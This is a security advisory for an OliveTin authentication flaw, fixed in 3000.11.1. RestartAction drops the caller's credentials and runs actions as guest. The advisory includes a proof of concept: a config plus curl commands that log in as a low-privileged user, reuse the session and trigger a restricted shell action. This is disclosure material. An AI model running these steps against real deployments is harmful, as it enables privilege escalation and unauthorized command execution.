OliveTin gives access to predefined shell commands from a web interface. Prior to version 3000.11.1, an authentication context confusion…
GitHub_M·CWE-250·Published 2026-03-05
OliveTin gives access to predefined shell commands from a web interface. Prior to version 3000.11.1, an authentication context confusion vulnerability in RestartAction allows a low‑privileged authenticated user to execute actions they are not permitted to run. RestartAction constructs a new internal connect.Request without preserving the original caller’s authentication headers or cookies. When this synthetic request is passed to StartAction, the authentication resolver falls back to the guest user. If the guest account has broader permissions than the authenticated caller, this results in privilege escalation and unauthorized command execution. This vulnerability allows a low‑privileged authenticated user to bypass ACL restrictions and execute arbitrary configured shell actions. This issue has been patched in version 3000.11.1.
OliveTin gives access to predefined shell commands from a web interface. Prior to version 3000.11.1, an authentication context confusion vulnerability in RestartAction allows a low‑privileged authenticated user to execute actions they are not permitted to run. RestartAction constructs a new internal connect.Request without preserving the original caller’s authentication headers or cookies. When this synthetic request is passed to StartAction, the authentication resolver falls back to the guest user. If the guest account has broader permissions than the authenticated caller, this results in privilege escalation and unauthorized command execution. This vulnerability allows a low‑privileged authenticated user to bypass ACL restrictions and execute arbitrary configured shell actions. This issue has been patched in version 3000.11.1.
OliveTin's RestartAction always runs actions as guest in github.com/OliveTin/OliveTin
### Summary An authentication context confusion vulnerability in RestartAction allows a low‑privileged authenticated user to execute actions they are not permitted to run. RestartAction constructs a new internal connect.Request without preserving the original caller’s authentication headers or cookies. When this synthetic request is passed to StartAction, the authentication resolver falls back to the guest user. If the guest account has broader permissions than the authenticated caller, this results in privilege escalation and unauthorized command execution. This vulnerability allows a low‑privileged authenticated user to bypass ACL restrictions and execute arbitrary configured shell actions. ### Details Affected files: service/internal/api/api.go service/internal/auth/authcheck.go Relevant code in RestartAction: ``` return api.StartAction(ctx, &connect.Request[apiv1.StartActionRequest]{ Msg: &apiv1.StartActionRequest{ BindingId: execReqLogEntry.GetBindingId(), UniqueTrackingId: req.Msg.ExecutionTrackingId, }, }) ``` Authentication in StartAction: ``` authenticatedUser := auth.UserFromApiCall(ctx, req, api.cfg) ``` Issue: 1. RestartAction creates a new connect.Request object. 2. The new request does not preserve caller headers or cookies. 3. UserFromApiCall() attempts to resolve the user from the request. 4. Because authentication headers are missing, it falls back to the guest user. 5. If guest.exec = true while the original caller has exec = false, the action executes with elevated privileges. ### PoC Configuration: ``` defaultPermissions: exec: false users: - username: low password: lowpass permissions: exec: false - username: guest permissions: exec: true actions: - id: restart_bypass_action shell: | echo "pwned" > /tmp/olivetin_restart_bypass.txt ``` Steps to reproduce: Login as low user ``` LOW_LOGIN=$(curl -sS -i -X POST \ http://localhost:1337/olivetin.api.v1.OliveTinApiService/LocalUserLogin \ -H 'Content-Type: application/json' \ -d '{"username":"low","password":"lowpass"}') LOW_SID=$(printf '%s\n' "$LOW_LOGIN" | tr -d '\r' | \ awk -F'[=;]' '/^Set-Cookie: olivetin-sid-local=/{print $2; exit}') ``` Attempt direct execution (correctly blocked) ``` LOW_RUN=$(curl -sS -X POST \ http://localhost:1337/olivetin.api.v1.OliveTinApiService/StartActionAndWait \ -H 'Content-Type: application/json' \ -H "Cookie: olivetin-sid-local=$LOW_SID" \ -d '{"actionId":"restart_bypass_action"}') echo "$LOW_RUN" ``` This should return permission denied. Extract executionTrackingId from response: ``` TRACKING_ID=$(printf '%s' "$LOW_RUN" | \ sed -n 's/.*"executionTrackingId":"\([^"]*\)".*/\1/p' | head -n1) echo "Tracking ID: $TRACKING_ID" ``` Call RestartAction: ``` curl -sS -X POST \ http://localhost:1337/olivetin.api.v1.OliveTinApiService/RestartAction \ -H 'Content-Type: application/json' \ -H "Cookie: olivetin-sid-local=$LOW_SID" \ -d "{\"executionTrackingId\":\"$TRACKING_ID\"}" ``` Verify command executed: ``` cat /tmp/olivetin_restart_bypass.txt ``` Output: ``` pwned ``` ### Impact - Privilege Escalation - ACL Bypass - Unauthorized Command Execution Any authenticated low-privilege user can execute actions they are not authorized to run if: - Guest has broader permissions - RestartAction is enabled Because OliveTin actions execute system shell commands, this can lead to: - Arbitrary file writes - Sensitive data exposure - Potential full host compromise (depending on OliveTin runtime privileges) This affects all deployments where: - guest.exec = true - A restricted user has exec = false - RestartAction endpoint is accessible
OliveTin da acceso a comandos shell predefinidos desde una interfaz web. Antes de la versión 3000.11.1, una vulnerabilidad de confusión de contexto de autenticación en RestartAction permite a un usuario autenticado con bajos privilegios ejecutar acciones que no tiene permitido ejecutar. RestartAction construye una nueva connect.Request interna sin preservar los encabezados de autenticación o las cookies del llamador original. Cuando esta solicitud sintética se pasa a StartAction, el resolvedor de autenticación recurre al usuario invitado. Si la cuenta de invitado tiene permisos más amplios que el llamador autenticado, esto resulta en escalada de privilegios y ejecución de comandos no autorizada. Esta vulnerabilidad permite a un usuario autenticado con bajos privilegios eludir las restricciones de ACL y ejecutar acciones shell configuradas arbitrarias. Este problema ha sido parcheado en la versión 3000.11.1.
| Version | Type | Source | Base | Exp | Impact | Vector |
|---|---|---|---|---|---|---|
| 3.1 | Primary | cve.org | 5.3 | — | — | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N |
| 3.1 | Primary | cve.org | 5.3 | — | — | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N |
| 3.1 | Primary | NVD | 4.3 | 2.8 | 1.4 | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N |
| 3.1 | Secondary | NVD | 5.3 | 3.9 | 1.4 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N |
| 3.1 | Secondary | GHSA | 5.3 | — | — | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N |